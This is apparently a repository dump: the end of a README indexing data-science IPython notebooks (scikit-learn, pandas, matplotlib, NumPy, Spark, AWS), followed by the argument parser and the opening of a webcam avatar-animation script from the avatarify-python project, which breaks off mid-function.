|--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [intro](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-intro.ipynb) | Intro notebook to scikit-learn. Scikit-learn adds Python support for large, multi-dimensional arrays and matrices, along with a large library of high-level mathematical functions to operate on these arrays. | | [knn](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-intro.ipynb#K-Nearest-Neighbors-Classifier) | Implement k-nearest neighbors in scikit-learn. 
| | [linear-reg](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-linear-reg.ipynb) | Implement linear regression in scikit-learn. | | [svm](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-svm.ipynb) | Implement support vector machine classifiers with and without kernels in scikit-learn. | | [random-forest](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-random-forest.ipynb) | Implement random forest classifiers and regressors in scikit-learn. | | [k-means](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-k-means.ipynb) | Implement k-means clustering in scikit-learn. | | [pca](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-pca.ipynb) | Implement principal component analysis in scikit-learn. | | [gmm](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-gmm.ipynb) | Implement Gaussian mixture models in scikit-learn. | | [validation](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-validation.ipynb) | Implement validation and model selection in scikit-learn. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/scipy.png"> </p> ## statistical-inference-scipy IPython Notebook(s) demonstrating statistical inference with SciPy functionality. | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | scipy | SciPy is a collection of mathematical algorithms and convenience functions built on the Numpy extension of Python. It adds significant power to the interactive Python session by providing the user with high-level commands and classes for manipulating and visualizing data. | | [effect-size](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scipy/effect_size.ipynb) | Explore statistics that quantify effect size by analyzing the difference in height between men and women. Uses data from the Behavioral Risk Factor Surveillance System (BRFSS) to estimate the mean and standard deviation of height for adult women and men in the United States. | | [sampling](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scipy/sampling.ipynb) | Explore random sampling by analyzing the average weight of men and women in the United States using BRFSS data. | | [hypothesis](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scipy/hypothesis.ipynb) | Explore hypothesis testing by analyzing the difference of first-born babies compared with others. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/pandas.png"> </p> ## pandas IPython Notebook(s) demonstrating pandas functionality. 
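The notebooks below walk through indexing, missing data, grouping, merging, and pivot tables; as a quick taste of those operations, here is a tiny illustrative sketch with made-up data (not taken from any of the notebooks):

```python
import numpy as np
import pandas as pd

# Toy DataFrame (illustrative only), touching a few of the topics in the
# notebooks below: selection, missing values, grouping, and pivot tables.
df = pd.DataFrame({
    'city': ['NYC', 'NYC', 'SF', 'SF'],
    'year': [2014, 2015, 2014, 2015],
    'sales': [120.0, np.nan, 95.0, 110.0],
})

print(df.loc[df['city'] == 'SF'])                    # data indexing and selection
print(df['sales'].fillna(df['sales'].mean()))        # handling missing values
print(df.groupby('city')['sales'].mean())            # aggregation and grouping
print(df.pivot_table(values='sales',
                     index='city', columns='year'))  # pivot tables
```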
| Notebook | Description | |--------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------| | [pandas](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/pandas.ipynb) | Software library written for data manipulation and analysis in Python. Offers data structures and operations for manipulating numerical tables and time series. | | [github-data-wrangling](https://github.com/donnemartin/viz/blob/master/githubstats/data_wrangling.ipynb) | Learn how to load, clean, merge, and feature engineer by analyzing GitHub data from the [`Viz`](https://github.com/donnemartin/viz) repo. | | [Introduction-to-Pandas](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.00-Introduction-to-Pandas.ipynb) | Introduction to Pandas. | | [Introducing-Pandas-Objects](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.01-Introducing-Pandas-Objects.ipynb) | Learn about Pandas objects. | | [Data Indexing and Selection](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.02-Data-Indexing-and-Selection.ipynb) | Learn about data indexing and selection in Pandas. | | [Operations-in-Pandas](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.03-Operations-in-Pandas.ipynb) | Learn about operating on data in Pandas. | | [Missing-Values](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.04-Missing-Values.ipynb) | Learn about handling missing data in Pandas. | | [Hierarchical-Indexing](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.05-Hierarchical-Indexing.ipynb) | Learn about hierarchical indexing in Pandas. | | [Concat-And-Append](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.06-Concat-And-Append.ipynb) | Learn about combining datasets: concat and append in Pandas. | | [Merge-and-Join](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.07-Merge-and-Join.ipynb) | Learn about combining datasets: merge and join in Pandas. | | [Aggregation-and-Grouping](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.08-Aggregation-and-Grouping.ipynb) | Learn about aggregation and grouping in Pandas. | | [Pivot-Tables](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.09-Pivot-Tables.ipynb) | Learn about pivot tables in Pandas. | | [Working-With-Strings](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.10-Working-With-Strings.ipynb) | Learn about vectorized string operations in Pandas. | | [Working-with-Time-Series](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.11-Working-with-Time-Series.ipynb) | Learn about working with time series in pandas. | | [Performance-Eval-and-Query](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.12-Performance-Eval-and-Query.ipynb) | Learn about high-performance Pandas: eval() and query() in Pandas. 
| <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/matplotlib.png"> </p> ## matplotlib IPython Notebook(s) demonstrating matplotlib functionality. | Notebook | Description | |-----------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------| | [matplotlib](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/matplotlib.ipynb) | Python 2D plotting library which produces publication quality figures in a variety of hardcopy formats and interactive environments across platforms. | | [matplotlib-applied](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/matplotlib-applied.ipynb) | Apply matplotlib visualizations to Kaggle competitions for exploratory data analysis. Learn how to create bar plots, histograms, subplot2grid, normalized plots, scatter plots, subplots, and kernel density estimation plots. | | [Introduction-To-Matplotlib](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.00-Introduction-To-Matplotlib.ipynb) | Introduction to Matplotlib. | | [Simple-Line-Plots](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.01-Simple-Line-Plots.ipynb) | Learn about simple line plots in Matplotlib. | | [Simple-Scatter-Plots](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.02-Simple-Scatter-Plots.ipynb) | Learn about simple scatter plots in Matplotlib. | | [Errorbars.ipynb](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.03-Errorbars.ipynb) | Learn about visualizing errors in Matplotlib. | | [Density-and-Contour-Plots](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.04-Density-and-Contour-Plots.ipynb) | Learn about density and contour plots in Matplotlib. | | [Histograms-and-Binnings](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.05-Histograms-and-Binnings.ipynb) | Learn about histograms, binnings, and density in Matplotlib. | | [Customizing-Legends](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.06-Customizing-Legends.ipynb) | Learn about customizing plot legends in Matplotlib. | | [Customizing-Colorbars](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.07-Customizing-Colorbars.ipynb) | Learn about customizing colorbars in Matplotlib. | | [Multiple-Subplots](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.08-Multiple-Subplots.ipynb) | Learn about multiple subplots in Matplotlib. | | [Text-and-Annotation](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.09-Text-and-Annotation.ipynb) | Learn about text and annotation in Matplotlib. | | [Customizing-Ticks](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.10-Customizing-Ticks.ipynb) | Learn about customizing ticks in Matplotlib. 
| | [Settings-and-Stylesheets](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.11-Settings-and-Stylesheets.ipynb) | Learn about customizing Matplotlib: configurations and stylesheets. | | [Three-Dimensional-Plotting](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.12-Three-Dimensional-Plotting.ipynb) | Learn about three-dimensional plotting in Matplotlib. | | [Geographic-Data-With-Basemap](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.13-Geographic-Data-With-Basemap.ipynb) | Learn about geographic data with basemap in Matplotlib. | | [Visualization-With-Seaborn](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.14-Visualization-With-Seaborn.ipynb) | Learn about visualization with Seaborn. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/numpy.png"> </p> ## numpy IPython Notebook(s) demonstrating NumPy functionality. | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [numpy](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/numpy.ipynb) | Adds Python support for large, multi-dimensional arrays and matrices, along with a large library of high-level mathematical functions to operate on these arrays. | | [Introduction-to-NumPy](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.00-Introduction-to-NumPy.ipynb) | Introduction to NumPy. | | [Understanding-Data-Types](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.01-Understanding-Data-Types.ipynb) | Learn about data types in Python. | | [The-Basics-Of-NumPy-Arrays](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.02-The-Basics-Of-NumPy-Arrays.ipynb) | Learn about the basics of NumPy arrays. | | [Computation-on-arrays-ufuncs](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.03-Computation-on-arrays-ufuncs.ipynb) | Learn about computations on NumPy arrays: universal functions. | | [Computation-on-arrays-aggregates](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.04-Computation-on-arrays-aggregates.ipynb) | Learn about aggregations: min, max, and everything in between in NumPy. | | [Computation-on-arrays-broadcasting](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.05-Computation-on-arrays-broadcasting.ipynb) | Learn about computation on arrays: broadcasting in NumPy. | | [Boolean-Arrays-and-Masks](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.06-Boolean-Arrays-and-Masks.ipynb) | Learn about comparisons, masks, and boolean logic in NumPy. | | [Fancy-Indexing](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.07-Fancy-Indexing.ipynb) | Learn about fancy indexing in NumPy. 
| | [Sorting](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.08-Sorting.ipynb) | Learn about sorting arrays in NumPy. | | [Structured-Data-NumPy](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.09-Structured-Data-NumPy.ipynb) | Learn about structured data: NumPy's structured arrays. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/python.png"> </p> ## python-data IPython Notebook(s) demonstrating Python functionality geared towards data analysis. | Notebook | Description | |-----------------------------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------| | [data structures](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/python-data/structs.ipynb) | Learn Python basics with tuples, lists, dicts, sets. | | [data structure utilities](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/python-data/structs_utils.ipynb) | Learn Python operations such as slice, range, xrange, bisect, sort, sorted, reversed, enumerate, zip, list comprehensions. | | [functions](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/python-data/functions.ipynb) | Learn about more advanced Python features: Functions as objects, lambda functions, closures, *args, **kwargs currying, generators, generator expressions, itertools. | | [datetime](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/python-data/datetime.ipynb) | Learn how to work with Python dates and times: datetime, strftime, strptime, timedelta. | | [logging](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/python-data/logs.ipynb) | Learn about Python logging with RotatingFileHandler and TimedRotatingFileHandler. | | [pdb](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/python-data/pdb.ipynb) | Learn how to debug in Python with the interactive source code debugger. | | [unit tests](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/python-data/unit_tests.ipynb) | Learn how to test in Python with Nose unit tests. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/kaggle.png"> </p> ## kaggle-and-business-analyses IPython Notebook(s) used in [kaggle](https://www.kaggle.com/) competitions and business analyses. | Notebook | Description | |-------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------| | [titanic](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/kaggle/titanic.ipynb) | Predict survival on the Titanic. Learn data cleaning, exploratory data analysis, and machine learning. | | [churn-analysis](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/analyses/churn.ipynb) | Predict customer churn. 
Exercise logistic regression, gradient boosting classifiers, support vector machines, random forests, and k-nearest-neighbors. Includes discussions of confusion matrices, ROC plots, feature importances, prediction probabilities, and calibration/discrimination.| <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/spark.png"> </p> ## spark IPython Notebook(s) demonstrating spark and HDFS functionality. | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------| | [spark](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/spark/spark.ipynb) | In-memory cluster computing framework, up to 100 times faster for certain applications; well suited for machine learning algorithms. | | [hdfs](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/spark/hdfs.ipynb) | Reliably stores very large files across machines in a large cluster. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/mrjob.png"> </p> ## mapreduce-python IPython Notebook(s) demonstrating Hadoop MapReduce with mrjob functionality. | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------| | [mapreduce-python](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/mapreduce/mapreduce-python.ipynb) | Runs MapReduce jobs in Python, executing jobs locally or on Hadoop clusters. Demonstrates Hadoop Streaming in Python code with a unit test and an [mrjob](https://github.com/Yelp/mrjob) config file to analyze Amazon S3 bucket logs on Elastic MapReduce. [Disco](https://github.com/discoproject/disco/) is another Python-based alternative.| <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/aws.png"> </p> ## aws IPython Notebook(s) demonstrating Amazon Web Services (AWS) and AWS tools functionality. Also check out: * [SAWS](https://github.com/donnemartin/saws): A supercharged AWS command line interface (CLI). * [Awesome AWS](https://github.com/donnemartin/awesome-aws): A curated list of libraries, open source repos, guides, blogs, and other resources. | Notebook | Description | |------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [boto](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/aws/aws.ipynb#Boto) | Official AWS SDK for Python. | | [s3cmd](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/aws/aws.ipynb#s3cmd) | Interacts with S3 through the command line.
| | [s3distcp](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/aws/aws.ipynb#s3distcp) | Combines smaller files and aggregates them together by taking in a pattern and target file. S3DistCp can also be used to transfer large volumes of data from S3 to your Hadoop cluster. | | [s3-parallel-put](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/aws/aws.ipynb#s3-parallel-put) | Uploads multiple files to S3 in parallel. | | [redshift](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/aws/aws.ipynb#redshift) | Acts as a fast data warehouse built on top of technology from massive parallel processing (MPP). | | [kinesis](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/aws/aws.ipynb#kinesis) | Streams data in real time with the ability to process thousands of data streams per second. | | [lambda](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/aws/aws.ipynb#lambda) | Runs code in response to events, automatically managing compute resources. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/commands.png"> </p> ## commands IPython Notebook(s) demonstrating various command lines for Linux, Git, etc. | Notebook | Description | |--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [linux](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/linux.ipynb) | Unix-like and mostly POSIX-compliant computer operating system. Disk usage, splitting files, grep, sed, curl, viewing running processes, terminal syntax highlighting, and Vim.| | [anaconda](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/misc.ipynb#anaconda) | Distribution of the Python programming language for large-scale data processing, predictive analytics, and scientific computing, that aims to simplify package management and deployment. | | [ipython notebook](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/misc.ipynb#ipython-notebook) | Web-based interactive computational environment where you can combine code execution, text, mathematics, plots and rich media into a single document. | | [git](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/misc.ipynb#git) | Distributed revision control system with an emphasis on speed, data integrity, and support for distributed, non-linear workflows. | | [ruby](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/misc.ipynb#ruby) | Used to interact with the AWS command line and for Jekyll, a blog framework that can be hosted on GitHub Pages. | | [jekyll](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/misc.ipynb#jekyll) | Simple, blog-aware, static site generator for personal, project, or organization sites. 
Renders Markdown or Textile and Liquid templates, and produces a complete, static website ready to be served by Apache HTTP Server, Nginx or another web server. | | [pelican](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/misc.ipynb#pelican) | Python-based alternative to Jekyll. | | [django](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/misc.ipynb#django) | High-level Python Web framework that encourages rapid development and clean, pragmatic design. It can be useful to share reports/analyses and for blogging. Lighter-weight alternatives include [Pyramid](https://github.com/Pylons/pyramid), [Flask](https://github.com/pallets/flask), [Tornado](https://github.com/tornadoweb/tornado), and [Bottle](https://github.com/bottlepy/bottle). ## misc IPython Notebook(s) demonstrating miscellaneous functionality. | Notebook | Description | |--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [regex](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/misc/regex.ipynb) | Regular expression cheat sheet useful in data wrangling.| [algorithmia](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/misc/Algorithmia.ipynb) | Algorithmia is a marketplace for algorithms. This notebook showcases 4 different algorithms: Face Detection, Content Summarizer, Latent Dirichlet Allocation and Optical Character Recognition.| ## notebook-installation ### anaconda Anaconda is a free distribution of the Python programming language for large-scale data processing, predictive analytics, and scientific computing that aims to simplify package management and deployment. Follow instructions to install [Anaconda](https://docs.continuum.io/anaconda/install) or the more lightweight [miniconda](http://conda.pydata.org/miniconda.html). ### dev-setup For detailed instructions, scripts, and tools to set up your development environment for data analysis, check out the [dev-setup](https://github.com/donnemartin/dev-setup) repo. ### running-notebooks To view interactive content or to modify elements within the IPython notebooks, you must first clone or download the repository then run the notebook. More information on IPython Notebooks can be found [here.](http://ipython.org/notebook.html) $ git clone https://github.com/donnemartin/data-science-ipython-notebooks.git $ cd data-science-ipython-notebooks $ jupyter notebook Notebooks tested with Python 2.7.x. 
## credits * [Python for Data Analysis: Data Wrangling with Pandas, NumPy, and IPython](http://www.amazon.com/Python-Data-Analysis-Wrangling-IPython/dp/1449319793) by Wes McKinney * [PyCon 2015 Scikit-learn Tutorial](https://github.com/jakevdp/sklearn_pycon2015) by Jake VanderPlas * [Python Data Science Handbook](https://github.com/jakevdp/PythonDataScienceHandbook) by Jake VanderPlas * [Parallel Machine Learning with scikit-learn and IPython](https://github.com/ogrisel/parallel_ml_tutorial) by Olivier Grisel * [Statistical Inference Using Computational Methods in Python](https://github.com/AllenDowney/CompStats) by Allen Downey * [TensorFlow Examples](https://github.com/aymericdamien/TensorFlow-Examples) by Aymeric Damien * [TensorFlow Tutorials](https://github.com/pkmital/tensorflow_tutorials) by Parag K Mital * [TensorFlow Tutorials](https://github.com/nlintz/TensorFlow-Tutorials) by Nathan Lintz * [TensorFlow Tutorials](https://github.com/alrojo/tensorflow-tutorial) by Alexander R Johansen * [TensorFlow Book](https://github.com/BinRoot/TensorFlow-Book) by Nishant Shukla * [Summer School 2015](https://github.com/mila-udem/summerschool2015) by mila-udem * [Keras tutorials](https://github.com/leriomaggio/deep-learning-keras-tensorflow) by Valerio Maggio * [Kaggle](https://www.kaggle.com/) * [Yhat Blog](http://blog.yhat.com/) ## contributing Contributions are welcome! For bug reports or requests, please [submit an issue](https://github.com/donnemartin/data-science-ipython-notebooks/issues). ## contact-info Feel free to contact me to discuss any issues, questions, or comments. * Email: [[email protected]](mailto:[email protected]) * Twitter: [@donne_martin](https://twitter.com/donne_martin) * GitHub: [donnemartin](https://github.com/donnemartin) * LinkedIn: [donnemartin](https://www.linkedin.com/in/donnemartin) * Website: [donnemartin.com](http://donnemartin.com) ## license This repository contains a variety of content; some developed by Donne Martin, and some from third parties. The third-party content is distributed under the license provided by those parties. The content developed by Donne Martin is distributed under the following license: *I am providing code and resources in this repository to you under an open source license. Because this is my personal repository, the license you receive to my code and resources is from me and not my employer (Facebook).* Copyright 2015 Donne Martin Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
avatarify-python
862182cfbca5bd8a7473bed9c5f69f92e8d5cc7b
File: afy/arguments.py from argparse import ArgumentParser parser = ArgumentParser() parser.add_argument("--config", help="path to config") parser.add_argument("--checkpoint", default='vox-cpk.pth.tar', help="path to checkpoint to restore") parser.add_argument("--relative", dest="relative", action="store_true", help="use relative or absolute keypoint coordinates") parser.add_argument("--adapt_scale", dest="adapt_scale", action="store_true", help="adapt movement scale based on convex hull of keypoints") parser.add_argument("--no-pad", dest="no_pad", action="store_true", help="don't pad output image") parser.add_argument("--enc_downscale", default=1, type=float, help="Downscale factor for encoder input. Improves performance at the cost of quality.") parser.add_argument("--virt-cam", type=int, default=0, help="Virtual camera device ID") parser.add_argument("--no-stream", action="store_true", help="On Linux, force no streaming") parser.add_argument("--verbose", action="store_true", help="Print additional information") parser.add_argument("--hide-rect", action="store_true", default=False, help="Hide the helper rectangle in preview window") parser.add_argument("--avatars", default="./avatars", help="path to avatars directory") parser.add_argument("--is-worker", action="store_true", help="Whether to run this process as a remote GPU worker") parser.add_argument("--is-client", action="store_true", help="Whether to run this process as a client") parser.add_argument("--in-port", type=int, default=5557, help="Remote worker input port") parser.add_argument("--out-port", type=int, default=5558, help="Remote worker output port") parser.add_argument("--in-addr", type=str, default=None, help="Socket address for incoming messages, like example.com:5557") parser.add_argument("--out-addr", type=str, default=None, help="Socket address for outgoing messages, like example.com:5558") parser.add_argument("--jpg_quality", type=int, default=95, help="JPEG compression quality for image transmission") parser.set_defaults(relative=False) parser.set_defaults(adapt_scale=False) parser.set_defaults(no_pad=False) opt = parser.parse_args() if opt.is_client and (opt.in_addr is None or opt.out_addr is None): raise ValueError("You have to set --in-addr and --out-addr") File: afy/cam_fomm.py import os, sys from sys import platform as _platform import glob import yaml import time import requests import numpy as np import cv2 from afy.videocaptureasync import VideoCaptureAsync from afy.arguments import opt from afy.utils import info, Once, Tee, crop, pad_img, resize, TicToc import afy.camera_selector as cam_selector log = Tee('./var/log/cam_fomm.log') # Where to split an array from face_alignment to separate each landmark LANDMARK_SLICE_ARRAY = np.array([17, 22, 27, 31, 36, 42, 48, 60]) if _platform == 'darwin': if not opt.is_client: info('\nOnly remote GPU mode is supported for Mac (use --is-client with --in-addr and --out-addr to connect to the server)') info('Standalone version will be available later!\n') exit() def is_new_frame_better(source, driving, predictor): global avatar_kp global display_string if avatar_kp is None: display_string = "No face detected in avatar." return False if predictor.get_start_frame() is None: display_string = "No frame to compare to."
return True driving_smaller = resize(driving, (128, 128))[..., :3] new_kp = predictor.get_frame_kp(driving) if new_kp is not None: new_norm = (np.abs(avatar_kp - new_kp) ** 2).sum() old_norm = (np.abs(avatar_kp - predictor.get_start_frame_kp()) ** 2).sum() out_string = "{0} : {1}".format(int(new_norm * 100), int(old_norm * 100)) display_string = out_string log(out_string) return new_norm < old_norm else: display_string = "No face found!" return False def load_stylegan_avatar(): url = "https://thispersondoesnotexist.com/image" r = requests.get(url, headers={'User-Agent': "My User Agent 1.0"}).content image = np.frombuffer(r, np.uint8) image = cv2.imdecode(image, cv2.IMREAD_COLOR) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) image = resize(image, (IMG_SIZE, IMG_SIZE)) return image def load_images(IMG_SIZE = 256): avatars = [] filenames = [] images_list = sorted(glob.glob(f'{opt.avatars}/*')) for i, f in enumerate(images_list): if f.endswith('.jpg') or f.endswith('.jpeg') or f.endswith('.png'): img = cv2.imread(f) if img is None: log("Failed to open image: {}".format(f)) continue if img.ndim == 2: img = np.tile(img[..., None], [1, 1, 3]) img = img[..., :3][..., ::-1] img = resize(img, (IMG_SIZE, IMG_SIZE)) avatars.append(img) filenames.append(f) return avatars, filenames def change_avatar(predictor, new_avatar): global avatar, avatar_kp, kp_source avatar_kp = predictor.get_frame_kp(new_avatar) kp_source = None avatar = new_avatar predictor.set_source_image(avatar) def draw_rect(img, rw=0.6, rh=0.8, color=(255, 0, 0), thickness=2): h, w = img.shape[:2] l = w * (1 - rw) // 2 r = w - l u = h * (1 - rh) // 2 d = h - u img = cv2.rectangle(img, (int(l), int(u)), (int(r), int(d)), color, thickness) def kp_to_pixels(arr): '''Convert normalized landmark locations to screen pixels''' return ((arr + 1) * 127).astype(np.int32) def draw_face_landmarks(img, face_kp, color=(20, 80, 255)): if face_kp is not None: img = cv2.polylines(img, np.split(kp_to_pixels(face_kp), LANDMARK_SLICE_ARRAY), False, color) def print_help(): info('\n\n=== Control keys ===') info('1-9: Change avatar') for i, fname in enumerate(avatar_names): key = i + 1 name = fname.split('/')[-1] info(f'{key}: {name}') info('W: Zoom camera in') info('S: Zoom camera out') info('A: Previous avatar in folder') info('D: Next avatar in folder') info('Q: Get random avatar') info('X: Calibrate face pose') info('I: Show FPS') info('ESC: Quit') info('\nFull key list: https://github.com/alievk/avatarify#controls') info('\n\n') def draw_fps(frame, fps, timing, x0=10, y0=20, ystep=30, 